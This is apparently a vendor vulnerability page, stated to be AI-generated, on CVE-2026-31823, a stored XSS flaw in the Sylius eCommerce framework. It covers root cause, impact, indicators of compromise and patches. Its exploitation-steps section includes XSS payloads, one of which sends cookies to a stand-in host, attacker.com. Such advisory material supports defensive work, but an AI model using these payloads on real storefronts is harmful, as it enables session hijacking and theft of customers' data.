CVE-2026-31823: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-31823 is an authenticated stored cross-site scripting (XSS) vulnerability in the Sylius open-source eCommerce Framework built on Symfony. It affects multiple locations in both the shop frontend and admin panel where unsanitized entity names are rendered as raw HTML. Affected versions include 2.0.0–2.0.15, 2.1.0–2.1.11, and 2.2.0–2.2.2 (as well as legacy branches prior to 1.9.12, 1.10.16, 1.11.17, 1.12.23, 1.13.15, and 1.14.18). The vulnerability was published on March 9, 2026, and carries a CVSS v3.1 base score of 4.8 (Moderate) (GitHub Advisory, Sylius Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), manifesting in three distinct locations. First, the Twig breadcrumbs macro in shared/breadcrumbs.html.twig applies the |raw filter to label values derived from taxon names, product names, and ancestor names, allowing injected HTML/JavaScript to execute on the storefront. Second, ProductTaxonTreeController.js interpolates ${name} directly into an HTML template literal in its rowRenderer method without escaping. Third, Tom Select-based autocomplete fields in the admin panel render entity names as raw HTML in both dropdown items and options. An authenticated administrator with privileges to create or modify entity names (e.g., taxon names) can persistently inject malicious payloads that execute in the browsers of all subsequent users who view the affected pages (GitHub Advisory, Sylius Advisory).

Impact

Successful exploitation allows an authenticated administrator to persistently inject arbitrary HTML or JavaScript into pages viewed by all users of the storefront and admin panel. This can result in session hijacking, credential theft, unauthorized actions performed on behalf of victims, and exfiltration of sensitive data such as payment or personal information. The scope change in the CVSS score reflects that the injected script executes in the context of other users' browsers, extending impact beyond the attacker's own session (GitHub Advisory, Sylius Advisory).

Exploitability

There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation at this time (Feedly). The vulnerability requires authenticated administrator-level access and victim user interaction (browsing an affected page), which limits opportunistic exploitation. The EPSS score is approximately 0.026–0.043%, placing it in the 14th percentile for exploitation likelihood. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Responsible disclosure was credited to Djibril Mounkoro (@whiteov3rflow) and Bartłomiej Nowiński (@bnBart) (Sylius Advisory).

Exploitation steps

  1. Gain administrator access: Log in to the Sylius admin panel with an account that has privileges to create or edit taxon names, product names, or other entity names.
  2. Inject malicious payload: Navigate to the taxon or product management section and set an entity name to a crafted XSS payload, e.g., <img src=x onerror=alert('XSS')> or a more sophisticated payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  3. Save the entity: Submit the form to persist the malicious name in the database. No special encoding bypass is required since the application renders the value without sanitization.
  4. Trigger execution on the storefront: When any user (including unauthenticated shoppers) navigates to a page that renders the affected breadcrumb (e.g., a category or product page using the malicious taxon name), the injected script executes in their browser.
  5. Trigger execution in the admin panel: When any admin user opens the product taxon picker or an autocomplete field that displays the malicious entity name, the script executes in the admin context, potentially enabling session token theft or admin-level actions.
  6. Achieve objective: Collect stolen session cookies, redirect victims to phishing pages, or perform unauthorized actions on behalf of affected users (GitHub Advisory, Sylius Advisory).

Indicators of compromise

  • Logs: Web server or application access logs showing requests to category/product pages shortly followed by outbound requests to unknown external domains from client IPs; admin audit logs showing entity name modifications containing HTML tags (<script>, <img>, onerror=, etc.).
  • Database: Taxon names, product names, or other entity name fields in the database containing HTML or JavaScript payloads (e.g., <script>, <img src=x onerror=, javascript:).
  • Network: Unexpected outbound HTTP requests from user browsers to attacker-controlled domains originating from storefront or admin panel pages; unusual POST requests to external endpoints carrying cookie or session data.
  • Browser/Client: Users reporting unexpected pop-ups, redirects, or behavior on storefront category/product pages or admin autocomplete fields.

Mitigation and workarounds

Upgrade Sylius to a patched version: 2.0.16, 2.1.12, or 2.2.3 for currently supported branches; for legacy branches, upgrade to 1.9.12, 1.10.16, 1.11.17, 1.12.23, 1.13.15, or 1.14.18 (Sylius Advisory). If immediate upgrade is not possible, apply the following project-level overrides: (1) override templates/bundles/SyliusShopBundle/shared/breadcrumbs.html.twig to use {{ item.label }} instead of {{ item.label|raw }}; (2) override ProductTaxonTreeController.js to use an escapeHtml() function wrapping ${name}; (3) add an autocomplete-xss-protection.js script that wraps Tom Select renderers to escape entity names before rendering. Additionally, implement Content Security Policy (CSP) headers to reduce XSS impact, and restrict admin access to trusted personnel only (GitHub Advisory).

Community reactions

Sylius published an official security blog post and GitHub Security Advisory crediting researchers Djibril Mounkoro (@whiteov3rflow) and Bartłomiej Nowiński (@bnBart) for responsible disclosure (Sylius Blog, Sylius Advisory). No significant broader media coverage or notable community controversy has been observed beyond standard vulnerability tracking and aggregation sites.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management